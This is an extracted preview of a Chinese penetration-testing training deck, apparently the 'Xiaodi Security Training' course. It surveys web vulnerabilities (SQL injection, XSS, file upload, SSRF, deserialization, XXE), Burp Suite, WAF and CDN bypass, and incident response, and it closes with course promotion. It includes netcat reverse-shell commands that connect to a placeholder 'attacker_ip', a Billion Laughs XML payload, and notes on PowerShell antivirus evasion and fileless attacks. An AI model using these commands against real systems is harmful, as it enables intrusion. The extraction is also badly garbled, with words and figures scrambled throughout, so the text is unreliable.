还剩28页未读,继续阅读
本资源只提供10页预览,全部文档请下载后查看!喜欢就下载吧,查找使用更方便
文本内容:
小迪安全培训课件2020-V6第一章网络安全基础概述网络安全的重要性万30%12024/7全球攻击增长企业平均损失全天候防护年网络攻击事件同比增长威胁持续单次安全事件给企业造成的经济损失高达万网络威胁无时不在需要建立完善的安全防护体202430%,120,升级美元系网络安全核心名词解析攻击技术术语测试方法论概念验证证明漏洞存在性白盒测试拥有源代码和系统架构信息POC:,:漏洞利用代码可实际攻击黑盒测试模拟真实攻击者视角EXP:,:攻击载荷执行恶意操作灰盒测试部分信息已知的混合测试Payload:,:后门绕过认证的秘密通道:漏洞管理木马伪装的恶意程序:漏洞生命周期发现披露修复验证:→→→反弹远程命令执行通道Shell:风险评估评分与威胁建模:CVSS应急响应快速处置安全事件:网络架构与常见组件服务器数据库系统中间件与容器Web平台首选关系型数据库容器化部署IIS:Windows MySQL:Docker:开源高性能服务器企业级数据库应用服务器Apache:Oracle:Weblogic:Java EE反向代理与负载均衡文档型开源应用服务器Nginx:MongoDB:NoSQL Glassfish:应用容器内存数据库红帽应用平台Tomcat:Java Redis:Jboss:网络攻击链路示意攻击者发起攻击的黑客或恶意团体通常隐藏真实身份,代理跳板用于隐藏攻击源增加溯源难度的中间节点,目标服务器最终攻击目标可能是服务器、数据库或内网系统,Web第二章安全漏洞深度解析Web注入漏洞全景SQL注入类型与技巧盲注布尔盲注、时间盲注通过响应差异判断:,报错注入利用数据库错误信息获取数据:堆叠注入执行多条语句权限提升:SQL,注入通过查询带出数据绕过防火墙DNS:DNS,二次注入存储后再次调用触发漏洞:工具与绕过实战提示注入仍然是最常见的高危漏洞之:SQL一除了传统注入点还要关注、等,JSON XML自动化注入利用工具SQLMAP:新型数据格式的注入风险绕过编码、注释、大小写混淆WAF:多数据库差异、、语法特性:Oracle MSSQLPostgreSQL跨站脚本攻击XSS反射型存储型型XSS XSSDOM XSS恶意脚本通过参数传递需要诱导用户点恶意脚本存储在服务器中每次访问都会触完全在浏览器端触发不经过服务器利用URL,,,击常见于搜索框、错误页面等即时反馈场发危害最大常见于评论、留言板、个人动态修改结构实现攻击,JavaScript DOM景资料等用户生成内容防御机制绕过绕过通过、方法获取订单系统实战在订单备注中植入窃取管理员凭证HTTPOnly:XST TRACECookie:XSS绕过利用白名单域名或策略配置不当CSP:编码绕过实体、、编码:HTML UnicodeUTF-7文件上传漏洞010203文件解析漏洞编辑器安全绕过技术WAF的分号截断、的换行解析、、等富文本编辑器的历史双扩展名、类型伪造、文件头伪造、内容IIS
6.0Apache FCKeditorKindeditor MIME的空字节截断等服务器解析特性导致的安漏洞配置不当可直接上传填充、大小写变换等绕过文件上传检测Nginx,Webshell全问题0405二次渲染攻击变异.htaccess上传图片后服务器重新渲染在渲染后仍保留恶意代码的特殊构造技巧上传配置文件修改解析规则或利用免杀技术绕过安全检测,.htaccess,与攻击案例CSRF SSRF跨站请求伪造服务端请求伪造CSRF SSRF利用用户已登录的身份,诱导执行非预期操作典型场景包括:让服务器发起内网请求,突破网络隔离真实利用场景:•转账操作被劫持•内网端口扫描与服务探测•密码修改被伪造•读取云服务器元数据AWS、阿里云•管理员权限滥用•攻击内网Redis、FastCGI等服务•订单状态篡改•文件读取与代码执行防御要点:Token验证、Referer检查、二次确认机制逻辑越权与未授权访问登录脆弱点权限控制缺陷支付业务安全•弱口令与默认密码•水平越权:访问同级用户数据•金额篡改与负数绕过•认证绕过与Session劫持•垂直越权:普通用户获取管理权限•订单状态伪造•JWT令牌伪造•IDOR:直接对象引用漏洞•支付回调验证不当•OAuth授权缺陷•API权限校验缺失•优惠券逻辑漏洞验证码与安全机制Token验证码攻击图形验证码识别、短信验证码爆破、验证码重用、验证:OCR码逻辑绕过反序列化漏洞反序列化反序列化PHP Java魔术方法:__wakeup、__destruct、__toString等触发点Commons-Collections:经典利用链POP链构造:利用对象属性控制执行流程Fastjson:AutoType漏洞Phar反序列化:通过文件操作触发Jackson:多态类型处理缺陷Session反序列化:不同引擎的序列化差异原生序列化:ObjectInputStream风险漏洞绕过与利用技巧与攻击XXE XML无回显检测伪协议攻击通过外带、外带、报错回显等方DNS HTTP实体利用DTDfile://、http://、ftp://、php://等协议的利式,在没有直接输出的情况下确认漏洞定义外部实体读取本地文件、SSRF攻击内用,结合Wrapper实现更多功能网服务、拒绝服务攻击DOS炸弹XML BillionLaughs!DOCTYPE lolz[!ENTITY lollol!ENTITY lol1lol;lol;!ENTITY lol2lol1;lol1;]lolzlol2;/lolz漏洞攻击完整流程信息收集域名、子域名、端口、指纹、敏感目录漏洞发现扫描、手工测试、代码审计漏洞利用构造Payload、绕过防护权限提升获取Shell、内网渗透持久化控制后门植入、痕迹清理第三章实战工具与攻防技巧抓包工具详解Burp Suite基础配置与使用高级功能应用代理设置:浏览器配置、移动端抓包、上游代Repeater:请求包重放与手工修改测试理链Intruder:自动化Fuzz测试与爆破证书安装:HTTPS流量解密,各平台证书导入Scanner:被动扫描与主动漏洞检测Extender:插件扩展,集成各类工具Scope设置:限定测试范围,避免干扰MatchReplace:自动修改请求响应实战技巧自定义头绕过检测UA WAF修改User-Agent、X-Forwarded-For等请求头伪装真实用户状态码分析判断漏洞
200、
403、500等不同响应码的含义,以及如何通过状态码判断漏洞存在性目录扫描与字典优化正反向连接与反弹Shell正向连接反向连接目标主机开放端口,攻击者主动连接适用于攻击者监听端口,目标主动回连能绕过大多目标在公网且无防火墙限制的场景数防火墙和NAT限制nc-lvp4444-e/bin/bash ncattacker_ip4444-e/bin/bash在目标机器上监听端口,等待攻击者连接目标机器主动连接攻击者,适合内网穿透场景反弹技巧PowerShell ShellPowerShell反弹Shell可以绕过Windows Defender等安全软件检测通过Base64编码、混淆、分段执行等技术,可以有效躲避防火墙和杀软拦截常见Payload包括:•一句话PowerShell反弹Shell•通过IEX下载远程脚本执行•利用WMI、计划任务实现持久化•无文件攻击技术,完全在内存中运行绕过与真实获取CDN IP历史记录查询邮件服务探测通过DNS历史记录、网站快照、老旧子域名等途径,找到目标站点在使用CDN前的真实IP诱导目标网站发送邮件注册、找回密码等,从邮件头信息中获取源服务器IP地址子域名遍历证书追踪SSL测试站点的二级、三级子域名,部分子域名可能未接入CDN,从而暴露真实IP通过SSL证书的Common Name、SAN字段,或证书透明度日志,发现关联的其他域名和IP全网扫描信息Whois使用Zmap、Masscan等工具扫描整个IP段,根据响应特征Title、Server头等定位真实查询域名注册信息、备案信息,可能包含服务器IP或机房位置等线索服务器工具推荐fuckcdn:自动化CDN绕过工具集|Zmap:快速全网端口扫描|Censys/Shodan:网络空间搜索引擎数据加密与解密基础编码哈希Base64MD5用个可打印字符表示二进制数据常用于数据传输特点可逆非位哈希值不可逆用途密码存储、文件校验风险已被碰撞攻64,:,128,::加密编码后体积增加约击破解不推荐用于安全场景,33%,对称加密非对称加密AES RSA高级加密标准支持位密钥特点加解密使用同一密钥公钥加密、私钥解密或私钥签名、公钥验证应用、数字签,128/192/256:,,:HTTPS速度快适合大量数据名、密钥交换,密码破解思路与实战字典攻击使用常见密码字典暴力破解社会工程学根据目标信息生成定制字典::彩虹表预计算的哈希值查询表加密算法缺陷利用实现漏洞或弱密钥::暴力破解遍历所有可能的组合侧信道攻击通过时间、功耗等信息泄露::代码审计实战项目审计要点PHP无框架项目框架框架ThinkPHP Laravel重点关注拼接、文件包含、命令执行、文路由解析漏洞、缓存写入、模板注入、反序列反序列化链、盲注、文件读取、调SQL POPSQL件上传等危险函数的使用化等框架特有漏洞试模式信息泄露项目审计技巧Java过滤器认证绕过、权限校验缺失挖掘输出点、拼接、模板引擎Filter:XSS:JSP JavaScript框架表达式注入历史漏洞注入、的参数绑定问题Struts2:OGNL SQL:MyBatis Hibernate框架表达式注入、路由配置不当文件操作路径穿越、任意文件读写Spring:SpEL:组件反序列化漏洞漏洞解析器配置不当Fastjson:AutoType XXE:XML代码审计需要对语言特性和框架机制有深入理解通过静态分析工具辅助结合人工审计能够发现业务逻辑漏洞和深层次的安全隐患,,绕过技术WAF信息收集阶段1识别WAF类型和版本,了解防护规则特点,寻找WAF本身的漏洞和配置缺陷2编码与混淆URL编码、Unicode编码、十六进制编码、大小写混合、注释插入、空白字符等基础绕过技术协议特性利用3HTTP参数污染、分块传输编码、multipart boundary混淆、协议降级攻击4语义等价变换SQL注入中的同义函数替换、逻辑等价变换、XSS的标签变异、属性绕过行为造轮子5模拟正常用户行为,控制请求频率,分散攻击载荷,使用白名单IP或User-Agent典型绕过案例SQL注入绕过:使用内联注释/**/分隔关键字、科学计数法表示数字、利用MySQL的特殊语法文件上传绕过:双扩展名、MIME类型伪造、文件头魔数构造、00截断XSS绕过:标签变异如svg、事件处理器如onerror、JavaScript伪协议渗透测试环境Kali Linux是最流行的渗透测试操作系统预装了安全工具从信息收集到漏洞利用、从密码破解到无线攻击提供了完整的工具链熟练掌握Kali Linux,600+,Kali的使用是每个安全从业者的必备技能常用工具包括端口扫描、漏洞利用框架、抓包分析、注入检测、Kali,:Nmap MetasploitBurp SuiteSqlmap密码破解、无线破解等John theRipper Aircrack-ng第四章安全防护与应急响应攻击与防御是永恒的对抗本章从防御者视角出发讲解如何建立纵深防御体系提升员工安全意识以及在遭遇攻击时如何快速响应和处置安全不仅是,,,技术问题更是管理和流程问题只有攻防兼备才能真正保护企业的数字资产,,远程办公安全意识终端安全防护网络环境安全操作系统加固:及时更新补丁、关闭不必要服务VPN连接:使用企业VPN访问内网资源防病毒软件:安装企业级杀毒软件并保持更新避免公共WiFi:不使用咖啡馆、酒店等公共网络办公主机防火墙:配置出入站规则,限制可疑连接家庭路由器:修改默认密码、禁用全盘加密:使用BitLocker或FileVault保护数据HTTPS加密:确保访问的网站启用HTTPS屏幕锁定:离开工位时立即锁屏双因素认证:开启2FA提升账户安全口令安全与钓鱼防范12强密码策略密码管理器12位以上,大小写+数字+符号,不同系统使用不同密码使用1Password、LastPass等工具管理密码34识别钓鱼邮件敏感操作确认检查发件人地址、链接URL、附件类型涉及转账、密码修改等操作多渠道核实数据加密与备份对敏感文档进行加密存储,定期备份重要数据到离线存储介质不要将工作文件保存在个人云盘,避免通过个人邮箱传输公司文件安全守则与最佳实践网络使用规范•禁止使用公共WiFi处理公司业务•不连接未知USB设备到工作电脑•不点击来历不明的链接和附件•及时报告可疑的网络安全事件信息保密要求•严禁泄露客户信息、源代码、业务数据•不在社交媒体讨论公司内部信息•涉密文档设置访问权限,离职时彻底删除•打印的敏感文件妥善保管或销毁设备管理规范•使用企业邮箱而非个人邮箱•工作电脑仅用于办公,不安装游戏娱乐软件•移动办公使用公司配发的专用设备•设备遗失或被盗立即上报IT部门重要提醒:安全是每个人的责任一个小小的疏忽可能给公司带来巨大损失养成良好的安全习惯,从我做起!应急响应流程0102事件发现与上报初步评估与定级通过监控告警、用户反馈、安全扫描等方式发现安全事件,第一时间上报安全团队,启动应急响判断事件影响范围、严重程度、是否正在发生根据评估结果决定响应级别,是否需要启动紧急应流程预案0304遏制与隔离证据保全与分析立即采取措施阻止攻击扩散,如断网隔离、封禁IP、关闭服务、修改密码等保护未受影响的系保留日志、内存镜像、网络流量等证据分析攻击手法、入侵路径、影响范围,找出根本原因统0506漏洞修复与加固总结与改进修补被利用的漏洞,清除后门,恢复系统正常状态加强监控,防止攻击者再次入侵编写事件报告,总结经验教训更新应急预案,完善防护措施,举办安全培训提升全员意识日志分析与攻击溯源通过Web日志、系统日志、数据库日志、防火墙日志等多维度分析,还原攻击时间线使用ELK、Splunk等日志分析平台,关联异常行为结合威胁情报,识别攻击者身份和意图红蓝对抗演练定期组织攻防演练,红队模拟攻击,蓝队进行防御和检测通过实战演练检验安全体系的有效性,发现防御盲点,提升应急响应能力小迪安全培训学员成功案例个人职业发展学员张同学从零基础开始,通过小迪的系统培训,3个月后成功转行进入安全行业现已成长为某互联网公司的高级渗透测试工程师学员李同学在培训中表现优异,实战项目中发现某大型网站的高危漏洞,获得厂商致谢和丰厚奖金,在行业内赢得认可企业安全转型某金融科技公司通过小迪安全培训,为全体技术人员进行了为期3个月的系统培训培训后,安全事件发生率下降80%,漏洞修复时间缩短60%公司建立了完善的SDL流程,将安全左移到开发阶段通过代码审计和渗透测试,在上线前就发现并修复了大量安全隐患未来网络安全趋势展望零信任架构云与边缘安全安全攻防AI永不信任始终验证的理念将成为主流传统云原生安全、容器安全、微服务安全成为新挑,人工智能既是防御利器也是攻击武器机器学,边界防护失效基于身份的动态访问控制成为新战边缘计算的兴起带来新的攻击面需要新的,,习驱动的威胁检测与生成的钓鱼攻击并存攻AI,标准防护思路防进入智能化时代新兴技术带来的安全挑战量子计算现有加密算法面临被破解风险后量子密码学成为研究热点区块链安全智能合约漏洞、私钥管理、攻击等新型威胁:,:51%物联网安全海量智能设备接入安全管理和固件更新成为难题隐私计算联邦学习、安全多方计算在保护数据隐私中的应用:,:网络安全是一个不断演进的领域新技术带来新机遇也伴随新风险保持学习热情紧跟技术发展才能在安全领域立于不败之地,,,开启你的安全攻防之旅理论基础实战演练系统学习网络协议、操作系统、编程语言等基础知识通过CTF、漏洞挖掘、渗透测试项目积累经验职业发展认证考试从初级到高级,从技术到管理,规划职业路径获取CISP、OSCP、CEH等行业认可的专业证书持续学习社区交流关注最新漏洞、技术动态,保持知识更新参与安全社区,分享经验,结识同行理论与实战结合打造安全专家,网络安全不仅需要扎实的理论基础,更需要丰富的实战经验小迪安全培训提供从基础到进阶的完整课程体系,配合真实环境的攻防演练,让每一位学员都能成长为独当一面的安全专家持续学习迎接网络安全新时代,网络安全是一场没有终点的马拉松技术日新月异,威胁层出不穷,唯有保持学习的热情和探索的精神,才能在这个领域走得更远加入小迪安全,与志同道合的伙伴一起,共筑数字世界的安全防线!。
个人认证
优秀文档
获得点赞 0